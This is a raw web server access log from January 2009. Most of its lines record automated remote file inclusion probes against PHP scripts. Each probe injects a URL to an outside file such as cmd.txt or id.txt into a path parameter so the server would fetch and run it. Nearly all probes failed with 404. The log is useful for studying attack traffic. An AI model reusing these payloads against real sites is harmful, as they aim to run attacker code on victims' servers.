85.17.237.201 - - [13/Jan/2009:13:56:57 -0600] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=? HTTP/1.1" 404 337 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
85.17.237.201 - - [13/Jan/2009:14:05:46 -0600] "GET /logs/access_log.1227312000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=? HTTP/1.1" 404 364 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
89.218.85.18 - - [13/Jan/2009:14:09:20 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://h1.ripway.com/sampurna/kambe.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
89.218.85.18 - - [13/Jan/2009:14:09:20 -0600] "GET //include/bbs.lib.inc.php?site_path=http://h1.ripway.com/sampurna/kambe.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
66.225.211.132 - - [13/Jan/2009:14:18:59 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://h1.ripway.com/sampurna/kambe.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.820"
66.225.211.132 - - [13/Jan/2009:14:18:59 -0600] "GET //include/bbs.lib.inc.php?site_path=http://h1.ripway.com/sampurna/kambe.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.820"
66.147.239.184 - - [13/Jan/2009:14:20:00 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.skarstad.net/forum/id2.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
66.147.239.184 - - [13/Jan/2009:14:20:00 -0600] "GET //include/bbs.lib.inc.php?site_path=http://www.skarstad.net/forum/id2.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
211.234.111.100 - - [13/Jan/2009:14:30:45 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangwon.ac.kr/~faculty/kboard/data/id3.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
211.234.111.100 - - [13/Jan/2009:14:30:46 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangwon.ac.kr/~faculty/kboard/data/id3.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
211.234.111.100 - - [13/Jan/2009:14:31:12 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangwon.ac.kr/~faculty/kboard/data/id3.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
211.234.111.100 - - [13/Jan/2009:14:31:12 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangwon.ac.kr/~faculty/kboard/data/id3.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
211.234.111.100 - - [13/Jan/2009:14:31:54 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangwon.ac.kr/~faculty/kboard/data/id3.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
211.234.111.100 - - [13/Jan/2009:14:31:54 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangwon.ac.kr/~faculty/kboard/data/id3.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
189.54.249.148 - - [13/Jan/2009:14:42:06 -0600] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cosmickls.net/ids?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
189.54.249.148 - - [13/Jan/2009:14:42:07 -0600] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cosmickls.net/ids?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
189.54.249.148 - - [13/Jan/2009:14:42:58 -0600] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cosmickls.net/ids?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
189.54.249.148 - - [13/Jan/2009:14:42:58 -0600] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cosmickls.net/ids?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
115.178.60.108 - - [13/Jan/2009:14:57:08 -0600] "GET /?APB_rp=http://i0.co.kr/i0mall//admin/idit.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
115.178.60.108 - - [13/Jan/2009:14:57:10 -0600] "GET /logs/?APB_rp=http://i0.co.kr/i0mall//admin/idit.txt?? HTTP/1.1" 200 89963 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
74.95.82.114 - - [13/Jan/2009:15:02:04 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
74.95.82.114 - - [13/Jan/2009:15:02:05 -0600] "GET //include/bbs.lib.inc.php?site_path=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
64.22.110.198 - - [13/Jan/2009:15:02:15 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
64.22.110.198 - - [13/Jan/2009:15:02:15 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
61.106.21.38 - - [13/Jan/2009:15:06:07 -0600] "GET /logs/access_log.1229817600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.varico.poznan.pl/rada/includes/Cache/fx29id1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
61.106.21.38 - - [13/Jan/2009:15:06:08 -0600] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.varico.poznan.pl/rada/includes/Cache/fx29id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
61.106.21.38 - - [13/Jan/2009:15:06:08 -0600] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.varico.poznan.pl/rada/includes/Cache/fx29id1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
61.106.21.38 - - [13/Jan/2009:15:08:31 -0600] "GET /logs/access_log.1230076800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.varico.poznan.pl/rada/includes/Cache/fx29id1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
74.95.82.114 - - [13/Jan/2009:15:10:26 -0600] "GET /logs//errors.php?error=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.95.82.114 - - [13/Jan/2009:15:10:26 -0600] "GET //errors.php?error=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
65.55.208.131 - - [13/Jan/2009:15:25:14 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [13/Jan/2009:15:25:14 -0600] "GET /logs/access_log.1180310400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [13/Jan/2009:15:25:15 -0600] "GET /logs/access_log.1204675200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
85.25.152.167 - - [13/Jan/2009:15:27:09 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
85.25.152.167 - - [13/Jan/2009:15:27:09 -0600] "GET //appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
85.25.152.167 - - [13/Jan/2009:15:27:15 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
85.25.152.167 - - [13/Jan/2009:15:27:15 -0600] "GET //appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
85.25.152.167 - - [13/Jan/2009:15:27:17 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
85.25.152.167 - - [13/Jan/2009:15:27:17 -0600] "GET //appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
74.95.82.114 - - [13/Jan/2009:15:27:20 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
85.25.152.167 - - [13/Jan/2009:15:27:21 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
74.95.82.114 - - [13/Jan/2009:15:27:21 -0600] "GET //include/admin.lib.inc.php?site_path=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
85.25.152.167 - - [13/Jan/2009:15:27:21 -0600] "GET //appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
74.95.82.114 - - [13/Jan/2009:15:31:26 -0600] "GET /logs//include/write.php?dir=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
74.95.82.114 - - [13/Jan/2009:15:31:27 -0600] "GET //include/write.php?dir=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
61.62.88.233 - - [13/Jan/2009:15:35:37 -0600] "GET /logs/errors.php?errors=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
61.62.88.233 - - [13/Jan/2009:15:35:38 -0600] "GET /errors.php?errors=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
61.62.88.233 - - [13/Jan/2009:15:35:39 -0600] "GET /logs/errors.php?errors=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
61.62.88.233 - - [13/Jan/2009:15:35:40 -0600] "GET /errors.php?errors=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.105.248.66 - - [13/Jan/2009:15:40:30 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
124.105.248.66 - - [13/Jan/2009:15:40:30 -0600] "GET //appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
140.130.101.5 - - [13/Jan/2009:15:42:15 -0600] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
140.130.101.5 - - [13/Jan/2009:15:42:15 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
140.130.101.5 - - [13/Jan/2009:15:42:15 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
140.130.101.5 - - [13/Jan/2009:15:42:18 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
140.130.101.5 - - [13/Jan/2009:15:42:18 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
140.130.101.5 - - [13/Jan/2009:15:42:18 -0600] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
140.130.101.5 - - [13/Jan/2009:15:42:36 -0600] "GET /logs/access_log.1228953600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
140.130.101.5 - - [13/Jan/2009:15:42:38 -0600] "GET /logs/access_log.1228953600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.205.161.114 - - [13/Jan/2009:15:46:02 -0600] "GET /logs//main.php?_zb_path=http://www.geocities.com/coracore98/id.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
62.205.161.114 - - [13/Jan/2009:15:46:03 -0600] "GET //main.php?_zb_path=http://www.geocities.com/coracore98/id.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
62.205.161.114 - - [13/Jan/2009:15:46:53 -0600] "GET /logs//main.php?_zb_path=http://www.geocities.com/coracore98/id.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
62.205.161.114 - - [13/Jan/2009:15:46:54 -0600] "GET //main.php?_zb_path=http://www.geocities.com/coracore98/id.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
207.154.23.93 - - [13/Jan/2009:15:55:12 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
207.154.23.93 - - [13/Jan/2009:15:55:12 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
207.154.23.93 - - [13/Jan/2009:15:55:12 -0600] "GET //appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
207.154.23.93 - - [13/Jan/2009:15:55:12 -0600] "GET //appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
61.62.88.233 - - [13/Jan/2009:15:55:14 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
61.62.88.233 - - [13/Jan/2009:15:55:15 -0600] "GET //appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
61.62.88.233 - - [13/Jan/2009:15:55:57 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
61.62.88.233 - - [13/Jan/2009:15:55:58 -0600] "GET //appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
124.105.248.66 - - [13/Jan/2009:16:03:31 -0600] "GET /logs/errors.php?error=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
124.105.248.66 - - [13/Jan/2009:16:03:31 -0600] "GET /errors.php?error=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
64.22.110.198 - - [13/Jan/2009:16:09:11 -0600] "GET /logs//include/lib.inc.php?site_path=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
64.22.110.198 - - [13/Jan/2009:16:09:12 -0600] "GET //include/lib.inc.php?site_path=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
124.0.71.7 - - [13/Jan/2009:16:19:22 -0600] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://metrohalltoastmasters.ca/b1ttletX.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
124.0.71.7 - - [13/Jan/2009:16:19:22 -0600] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://metrohalltoastmasters.ca/b1ttletX.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
61.62.88.233 - - [13/Jan/2009:16:22:12 -0600] "GET /logs/errors.php?error=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
61.62.88.233 - - [13/Jan/2009:16:22:13 -0600] "GET /errors.php?error=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
193.25.112.69 - - [13/Jan/2009:16:22:56 -0600] "GET /logs/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/har/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.820"
193.25.112.69 - - [13/Jan/2009:16:22:56 -0600] "GET /modules/My_eGallery/index.php?basepath=http://h1.ripway.com/har/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.820"
61.62.88.233 - - [13/Jan/2009:16:23:43 -0600] "GET /logs/errors.php?error=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
61.62.88.233 - - [13/Jan/2009:16:23:44 -0600] "GET /errors.php?error=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
200.13.253.154 - - [13/Jan/2009:16:26:54 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
200.13.253.154 - - [13/Jan/2009:16:26:54 -0600] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.13.253.154 - - [13/Jan/2009:16:26:54 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
61.62.88.233 - - [13/Jan/2009:16:32:01 -0600] "GET /logs/errors.php?error=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
61.62.88.233 - - [13/Jan/2009:16:32:01 -0600] "GET /logs/errors.php?error=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
61.62.88.233 - - [13/Jan/2009:16:32:02 -0600] "GET /errors.php?error=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
61.62.88.233 - - [13/Jan/2009:16:32:06 -0600] "GET /errors.php?error=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
61.62.88.233 - - [13/Jan/2009:16:44:46 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
61.62.88.233 - - [13/Jan/2009:16:44:47 -0600] "GET //appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
200.13.253.154 - - [13/Jan/2009:16:44:58 -0600] "GET /logs/access_log.1228953600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
61.62.88.233 - - [13/Jan/2009:16:45:29 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
61.62.88.233 - - [13/Jan/2009:16:45:30 -0600] "GET //appserv/main.php?appserv_root=http://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.222.40.169 - - [13/Jan/2009:17:33:15 -0600] "GET /logs/add.php?APB_rp=http://www.shenlishi.com/skin/albania.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
77.222.40.169 - - [13/Jan/2009:17:33:15 -0600] "GET /add.php?APB_rp=http://www.shenlishi.com/skin/albania.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
77.222.40.169 - - [13/Jan/2009:17:33:27 -0600] "GET /logs/add.php?APB_rp=http://www.shenlishi.com/skin/albania.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
77.222.40.169 - - [13/Jan/2009:17:33:27 -0600] "GET /add.php?APB_rp=http://www.shenlishi.com/skin/albania.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
77.221.130.15 - - [13/Jan/2009:17:39:40 -0600] "GET /logs/add.php?APB_rp=http://www.shenlishi.com/skin/albania.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
77.221.130.15 - - [13/Jan/2009:17:39:41 -0600] "GET /add.php?APB_rp=http://www.shenlishi.com/skin/albania.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
77.221.130.15 - - [13/Jan/2009:17:40:21 -0600] "GET /logs/add.php?APB_rp=http://www.shenlishi.com/skin/albania.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
77.221.130.15 - - [13/Jan/2009:17:40:22 -0600] "GET /add.php?APB_rp=http://www.shenlishi.com/skin/albania.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.805"